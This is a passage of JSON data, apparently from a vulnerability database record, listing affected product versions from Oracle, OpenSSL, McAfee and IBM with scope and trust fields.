"6.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "access manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.4.3.0" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.11" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.4" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.2" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.1" }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0x" }, { "model": "project openssl 1.0.0t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zh", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zg", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zf", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8ze", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zd", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8." }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "tealeaf customer experience on cloud network capture add-on", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16.1.01" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.1.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.0.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.4" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.3" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "storediq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.4" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.6.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.6.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.5.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.4.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.3.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.9" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.8" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.14" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.13" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.12" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.11" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.10" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.21" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.20" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.19" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.18" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.15" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.14" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.13" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.12" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { 